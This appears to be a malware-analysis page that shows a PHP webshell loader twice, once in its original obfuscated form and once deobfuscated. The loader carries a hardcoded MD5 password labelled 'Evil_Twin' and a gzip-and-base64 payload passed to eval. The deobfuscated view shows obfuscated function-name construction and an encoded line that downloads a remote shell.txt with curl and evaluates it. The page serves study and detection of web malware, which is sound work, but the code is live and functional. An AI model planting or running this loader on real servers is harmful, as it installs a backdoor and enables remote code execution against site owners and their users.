PHP Malware Analysis

Back to list

Tags


Deobfuscated code

<?php

$auth_pass = '1ce078f22a61442f2477cf8a3270abb1';
// MD5 : Evil_Twin
$etw = 'jVXbcqJAFPwVy7LKsEtwLlzLysPGxGtijIlE87IVQBBFICAqpvz3BTLosEsq+zbUnO7p032O1ra6Zso8uKpU5y1u+wolMbrw3F8D0Oa7lZvf4+GuE1vBXpkJzIvfc+435uIRjS6fmutb7V1+mC77z6H+Y2Wr1+wdPvx8MxqTatOMXH1je24l9oNAAPiipuuRixBka7YfzRHPs7WNtYx4WWY+gvkmCtxKvc7lVVx6JoXZmdQm5+axtl96OwXgytWZnTTxIchH9vQhKkfu9IFF6ib5YJq1w1J3AZbLeBCgoDSnIFEX4MjW6wmR43gmgqWCkESBE1ZKg5JqcD3LAKJUBpVT9nM9hGm9GfohFvlvey88VTAiUZTwrJaLOcDit5ITKEUqpNBwHXsQospVjjwxkGAy2cRchj3dEpfYvOfUu/MtaSzDEnFM8pjl+T6WSjMq9kuLBqlMz3M3vALKkIWmsHxK0XmHcikAFKNA2QNz3Q2U8vHB9AO0TBKiadh8+UuFpk7SjP1qg0Bp6iKk6fOJtHXtIPA04K9R+iyLvIWlYIUqOz9AnGdzI9ncIIY9FxEPMndIV/Q10Z1dE0lpqLZhrSD8H6dxlqS/jSQEvw2S3vBsudYbzRLQVy7wSnHOE0C8N0OUjnZJMMUBO5+zddrOQ0tWlDIgFL9aS+lzjBZLRyzPli4uDAbMkNreCXix1EYJfKE2a3MZL3xZpNWeCEg0bG56YUkT91IDia3U8hLf2NwHLu+KzUUyDFet9ztDr3cDrBlWY62t+NraAYOW4Rnd8U4/eNs7PHRmyPA0PAR3a8M3Ogs4swVfi5XDW0cNtZYA5t1Hd/C8WRrTfjhN6o2OsjNa1mqGrLB3O1Qnq/1o0h6bk5U6UdX+g9ruXz87w85Y7YW9m1v/IR7Hr9Mh1LqP1ujp+pMHqfzry72X6ku4HWPdDgctvTGy9ajf7Ts6VkOjtZLqVe7fVUf0nwwqji8vUj+YF/m6sW9B8BZnbh6T/zaSBldvNOrJdjQaoe5fQgn/AQ==';
eval /* PHPDeobfuscator eval output */ {
    $vcbf840 = "eC.vZ176u(onAK0F4H D_RNwGygrx9Y5)WpIlMtfhQ2P-S;mEbq8OXjJTsc*kiVB,L3z+ad/U";
    function yprr503($ccun221, $ipue244, $tgju488)
    {
        return '' . $ccun221 . '' . $ipue244 . '' . $tgju488 . '';
    }
    $xjow903 = yprr503($vcbf840[58], "al", $vcbf840[36]);
    $zjcn038 = yprr503("_u", "se", '');
    $llof213 = yprr503($vcbf840[27], $vcbf840[20], $vcbf840[39]);
    $nogd067 = yprr503($vcbf840[8], '', $vcbf840[11]);
    $fsps364 = yprr503($vcbf840[58], $vcbf840[20], "ar");
    $kjhe036 = yprr503($vcbf840[27], $vcbf840[69], $vcbf840[25]);
    $smyo112 = yprr503(yprr503($xjow903, '', $zjcn038), yprr503($llof213, $nogd067, ''), yprr503($fsps364, '', $kjhe036));
    $gopp378 = yprr503($vcbf840[58], $vcbf840[27], $vcbf840[0]);
    $oont490 = yprr503($vcbf840[69], $vcbf840[38], '');
    $lllq180 = yprr503($vcbf840[0], '', $vcbf840[20]);
    $ecnr938 = yprr503($vcbf840[39], $vcbf840[8], $vcbf840[11]);
    $ffdi480 = yprr503($vcbf840[58], $vcbf840[38], '');
    $dxkt204 = yprr503($vcbf840[61], $vcbf840[10], '');
    $icbz544 = yprr503('', $vcbf840[11], '');
    $uohg939 = yprr503(yprr503($gopp378, $oont490, $lllq180), yprr503($ecnr938, '', $ffdi480), yprr503($dxkt204, '', $icbz544));
    $idgk110 = yprr503($vcbf840[0], '', $vcbf840[3]);
    $opvu721 = yprr503($vcbf840[69], $vcbf840[36], $vcbf840[9]);
    $mtbg524 = yprr503('', $vcbf840[49], $vcbf840[69]);
    $yxfs212 = yprr503($vcbf840[57], $vcbf840[0], $vcbf840[7]);
    $vesg899 = yprr503($vcbf840[16], $vcbf840[20], $vcbf840[70]);
    $ehjl604 = yprr503($vcbf840[0], $vcbf840[58], $vcbf840[10]);
    $bxlr460 = yprr503($vcbf840[70], $vcbf840[0], $vcbf840[9]);
    $jyhp869 = yprr503(yprr503($idgk110, $opvu721, ''), yprr503('', '', $mtbg524), yprr503($yxfs212, $vesg899 . $ehjl604, $bxlr460)) . "'JGNoID0gY3VybF9pbml0KCdodHRwczovL3NlY2dob3N0LmdpdGh1Yi5pby9zaGVsbC50eHQnKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyRyZXN1bHQgPSBjdXJsX2V4ZWMoJGNoKTtldmFsKCc/PicuJHJlc3VsdCk7'" . yprr503("))", '', $vcbf840[46]);
    $smyo112($uohg939, array('', '}' . $jyhp869 . '//'));
    //scp-173
};


Original code

<?php 
$auth_pass = '1ce078f22a61442f2477cf8a3270abb1'; // MD5 : Evil_Twin
$etw = 'jVXbcqJAFPwVy7LKsEtwLlzLysPGxGtijIlE87IVQBBFICAqpvz3BTLosEsq+zbUnO7p032O1ra6Zso8uKpU5y1u+wolMbrw3F8D0Oa7lZvf4+GuE1vBXpkJzIvfc+435uIRjS6fmutb7V1+mC77z6H+Y2Wr1+wdPvx8MxqTatOMXH1je24l9oNAAPiipuuRixBka7YfzRHPs7WNtYx4WWY+gvkmCtxKvc7lVVx6JoXZmdQm5+axtl96OwXgytWZnTTxIchH9vQhKkfu9IFF6ib5YJq1w1J3AZbLeBCgoDSnIFEX4MjW6wmR43gmgqWCkESBE1ZKg5JqcD3LAKJUBpVT9nM9hGm9GfohFvlvey88VTAiUZTwrJaLOcDit5ITKEUqpNBwHXsQospVjjwxkGAy2cRchj3dEpfYvOfUu/MtaSzDEnFM8pjl+T6WSjMq9kuLBqlMz3M3vALKkIWmsHxK0XmHcikAFKNA2QNz3Q2U8vHB9AO0TBKiadh8+UuFpk7SjP1qg0Bp6iKk6fOJtHXtIPA04K9R+iyLvIWlYIUqOz9AnGdzI9ncIIY9FxEPMndIV/Q10Z1dE0lpqLZhrSD8H6dxlqS/jSQEvw2S3vBsudYbzRLQVy7wSnHOE0C8N0OUjnZJMMUBO5+zddrOQ0tWlDIgFL9aS+lzjBZLRyzPli4uDAbMkNreCXix1EYJfKE2a3MZL3xZpNWeCEg0bG56YUkT91IDia3U8hLf2NwHLu+KzUUyDFet9ztDr3cDrBlWY62t+NraAYOW4Rnd8U4/eNs7PHRmyPA0PAR3a8M3Ogs4swVfi5XDW0cNtZYA5t1Hd/C8WRrTfjhN6o2OsjNa1mqGrLB3O1Qnq/1o0h6bk5U6UdX+g9ruXz87w85Y7YW9m1v/IR7Hr9Mh1LqP1ujp+pMHqfzry72X6ku4HWPdDgctvTGy9ajf7Ts6VkOjtZLqVe7fVUf0nwwqji8vUj+YF/m6sW9B8BZnbh6T/zaSBldvNOrJdjQaoe5fQgn/AQ=='; eval(gzinflate(base64_decode("$etw"))); ?>